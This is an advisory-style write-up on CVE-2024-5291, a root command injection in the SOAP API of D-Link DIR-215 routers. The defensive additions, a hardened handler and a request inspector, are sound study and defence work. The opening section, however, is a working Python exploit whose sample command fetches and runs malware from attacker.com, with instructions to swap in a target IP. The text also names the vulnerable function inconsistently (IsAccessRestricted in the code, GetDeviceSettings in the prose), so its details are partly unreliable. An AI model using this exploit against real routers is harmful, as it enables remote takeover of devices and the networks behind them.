A critical vulnerability has been identified in D-Link DIR-215 routers, which allows network-adjacent attackers to execute arbitrary code on affected installations without requiring authentication. This specific flaw exists within the SOAP (Simple Object Access Protocol) API interface, which listens on TCP port 80 by default. The issue stems from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can exploit this vulnerability to execute code in the context of root. The vulnerability is assigned CVE-2024-5291 and was previously identified as ZDI-CAN-21235.
The following Python code demonstrates the exploitation of this vulnerability.

```python
import requests

target_ip = "ROUTER_IP_HERE"  # Placeholder: replace with the target router's IP address
command = "curl http://attacker.com/malware -o /tmp/malware; chmod +x /tmp/malware; /tmp/malware"  # Replace with desired command
soap_action = "urn:schemas-upnp-org:service:WANIPConnection:1#IsAccessRestricted"

# The user-supplied NewTarget element is what the router passes to a system call
payload = f'''<?xml version="1.0" encoding="utf-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<u:IsAccessRestricted xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewTarget>|{command};</NewTarget>
</u:IsAccessRestricted>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>'''

headers = {
    "Content-Type": "text/xml; charset=utf-8",
    "SOAPAction": soap_action,
}
url = f"http://{target_ip}:80/soap.cgi"
response = requests.post(url, data=payload, headers=headers)
print(response.content)
```
Replace the target_ip variable with the target router's IP address and the command variable with the desired command to execute. This code sends a specially crafted SOAP request to the target router, executing the attacker's command as root.
Original References
1. Zero Day Initiative (ZDI) Vulnerability Disclosure: https://www.zerodayinitiative.com/advisories/ZDI-CAN-21235/
2. D-Link Security Advisory: https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10144
Exploit Details
The vulnerability (CVE-2024-5291) is a command injection vulnerability that affects the GetDeviceSettings function within the SOAP API interface of D-Link DIR-215 routers. An attacker can leverage this flaw by sending a specially crafted SOAP request containing malicious commands to the target router. Since the SOAP API interface listens on TCP port 80 by default, and there is no authentication required to exploit this vulnerability, an attacker can easily execute arbitrary code on the affected router with root privileges.
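The root cause described above is a string from the SOAP body being interpolated into a shell command line. The following is an added example, not D-Link's firmware code, that shows that unsafe shape beside a hardened handler: the value is checked against an allowlist (IP address or syntactic hostname) and then placed in an argv list so no shell ever parses it. The iptables command line and the validation policy are assumptions chosen for illustration; nothing in the block executes a command.

```python
"""
Added example (not the vendor's code): the unsafe pattern behind a SOAP
command injection beside a hardened version. The command being built
(an iptables check on the supplied target) is an assumption for this example.
"""
import ipaddress
import re
from typing import List

# RFC 1123 label grammar; the allowlist policy here is hypothetical.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}$")


def unsafe_command_line(new_target: str) -> str:
    """The shape of the bug: the SOAP element text is dropped straight into a
    shell command line. This returns the string that would be handed to a
    shell (it is deliberately NOT executed); every metacharacter survives."""
    return f"iptables -C FORWARD -d {new_target} -j DROP"


def validate_target(new_target: str) -> str:
    """Allowlist validation: accept an IPv4/IPv6 address or a syntactically
    valid hostname and reject everything else. Raises ValueError otherwise."""
    if not new_target or len(new_target) > 253:
        raise ValueError("target empty or too long")
    try:
        return str(ipaddress.ip_address(new_target))
    except ValueError:
        pass
    if _HOSTNAME_RE.match(new_target):
        return new_target
    raise ValueError(f"invalid target: {new_target!r}")


def safe_argv(new_target: str) -> List[str]:
    """Hardened form: validate first, then build an argv list. Running it with
    subprocess.run(argv, shell=False) means no shell ever sees the value, so
    even a value that slipped past validation is just one literal argument."""
    target = validate_target(new_target)
    return ["iptables", "-C", "FORWARD", "-d", target, "-j", "DROP"]


if __name__ == "__main__":
    # Constructed inputs: a benign target and one carrying shell metacharacters.
    for value in ("192.168.0.5", "|id;"):
        print("unsafe  :", unsafe_command_line(value))
        try:
            print("hardened:", safe_argv(value))
        except ValueError as exc:
            print("hardened: rejected ->", exc)
```

Two layers are deliberate: the allowlist stops bad input at the boundary, and the argv construction removes the shell from the path entirely, so a future validation mistake cannot turn back into code execution.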
Mitigation
Users of D-Link DIR-215 routers are advised to check for available firmware updates to fix this vulnerability. If a firmware update is not available, users should consider implementing strong access control mechanisms, such as a firewall or VPN, to restrict access to the router's SOAP API interface on TCP port 80.
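Where a firewall or proxy already sits in front of the router's port 80, it can also inspect what reaches soap.cgi. The following is an added example, not part of the advisory, of a small request inspector in the style of an IDS or WAF rule: it parses the SOAP body and flags any element whose text carries shell metacharacters, which a hostname or IP field should never contain. The request records are constructed for the example; the endpoint path and action name come from the PoC above.

```python
"""
Added example (not from the advisory): inspect SOAP requests to soap.cgi and
flag element text containing shell metacharacters. Sample requests below are
constructed for this example.
"""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

SOAP_ENDPOINT = "/soap.cgi"  # endpoint used in the advisory's PoC
# Characters that give a string meaning to /bin/sh; none belong in a host/IP field.
SHELL_META = re.compile(r"[;|&`$(){}<>\n]")


def inspect_request(path: str, headers: Dict[str, str], body: str) -> List[str]:
    """Return a list of findings for one HTTP request (empty means clean)."""
    findings: List[str] = []
    if not path.startswith(SOAP_ENDPOINT):
        return findings
    action = headers.get("SOAPAction", "<no SOAPAction>")
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return ["unparseable SOAP body on soap.cgi"]
    for elem in root.iter():
        text = (elem.text or "").strip()
        if text and SHELL_META.search(text):
            tag = elem.tag.rsplit("}", 1)[-1]  # drop the namespace prefix
            findings.append(f"{action}: shell metacharacter in <{tag}>: {text!r}")
    return findings


def scan(records: List[Dict[str, object]]) -> List[str]:
    """Run inspect_request over a batch of request records and collect alerts."""
    alerts = []
    for rec in records:
        for finding in inspect_request(rec["path"], rec["headers"], rec["body"]):
            alerts.append(f"{rec['src']} -> {finding}")
    return alerts


def _soap_body(new_target: str) -> str:
    # Helper to build constructed sample bodies in the PoC's structure.
    return (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
        "<s:Body>"
        '<u:IsAccessRestricted xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">'
        f"<NewTarget>{new_target}</NewTarget>"
        "</u:IsAccessRestricted></s:Body></s:Envelope>"
    )


ACTION = "urn:schemas-upnp-org:service:WANIPConnection:1#IsAccessRestricted"
BENIGN_BODY = _soap_body("192.168.0.5")
INJECTED_BODY = _soap_body("|id;")

# Constructed sample traffic: one legitimate call, one injection attempt,
# and one unrelated page fetch that the rule must ignore.
SAMPLE_REQUESTS = [
    {"src": "192.168.0.20", "path": "/soap.cgi", "headers": {"SOAPAction": ACTION}, "body": BENIGN_BODY},
    {"src": "192.168.0.66", "path": "/soap.cgi", "headers": {"SOAPAction": ACTION}, "body": INJECTED_BODY},
    {"src": "192.168.0.20", "path": "/index.html", "headers": {}, "body": ""},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_REQUESTS):
        print("ALERT", alert)
```

The rule keys on the field's semantics rather than on a specific command, so it catches the injection regardless of what follows the pipe; an unparseable body on the SOAP endpoint is reported too, since that is also not something a legitimate UPnP client sends.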
Conclusion
The discovery and disclosure of this command injection vulnerability in D-Link DIR-215 routers highlights the importance of proper validation of user-supplied input in networked devices. By exploiting this vulnerability, attackers can gain root access to affected routers, potentially compromising the security and privacy of connected devices. Users of these routers are advised to apply available firmware updates and implement appropriate access control measures to mitigate the risk associated with this vulnerability.
Timeline
Published on: 05/23/2024 22:15:14 UTC
Last modified on: 05/24/2024 01:15:30 UTC